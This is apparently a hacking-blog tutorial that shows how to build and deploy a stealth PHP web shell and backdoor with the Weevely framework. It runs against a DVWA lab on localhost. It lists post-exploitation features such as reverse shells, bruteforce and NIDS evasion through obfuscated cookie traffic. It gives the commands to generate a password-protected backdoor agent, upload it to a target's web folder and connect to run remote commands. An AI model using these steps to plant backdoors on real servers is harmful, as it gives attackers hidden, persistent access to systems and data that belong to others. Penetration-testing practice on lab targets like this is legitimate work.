Welcome back, Hackers! Today we’re going to create simple PHP Web Shell and Backdoor using Weevely.  Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.

Let’s get started!

Weevely php stealth web shell and backdoor has more than 30 modules available for post exploitation tasks.

The framework features:

  • Ssh-like terminal
  • SQL console pivoted on target
  • HTTP proxy pivoted on target
  • Host configuration security auditing
  • Mount of the remote filesystem
  • Network scan pivoted on target
  • File upload and download
  • Reverse and direct TCP shell
  • Meterpreter support
  • Service account bruteforce
  • Compressed archive management

Weevely php stealth web shell and backdoor communications are hidden, every communications between server and client are hidden in HTTP Cookies. Communications between client and server are obfuscated to bypass NIDS signature detection.

Things you need:

  1. Weevely https://github.com/epinna/weevely3
  2. Web Server (I’m using DVWA)

Generate the backdoor agent

Weevely client communicates to the PHP agent installed into the target. Move to the weevely3/folder and run ./weevely.py to print help or just simply type weevely in your terminal.

Generate the backdoor agent

[email protected]:~# weevely

[+] weevely 3.2.0
[!] Error: too few arguments

[+] Run terminal to the target
    weevely <URL> <password> [cmd]

[+] Load session file
    weevely session <path> [cmd]

[+] Generate backdoor agent
    weevely generate <password> <path>

[email protected]:~# 

To generate a new agent, just use the generate option passing the password and path arguments.

[email protected]:~# weevely generate 123 /root/Desktop/backdoor.php
Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1476 byte size.

Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.

Connect to the agent

Launch weevely script to connect to the remote agent.

[email protected]:~# weevely http://localhost/backdoor.php 123
weevely>

The first prompt weevely> is still not connected to allow users to set any useful pre-connection option e.g. set proxies to be used. Running a real command starts automatically the session on the remote target.

weevely> uname -a
Linux TheHackerToday 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux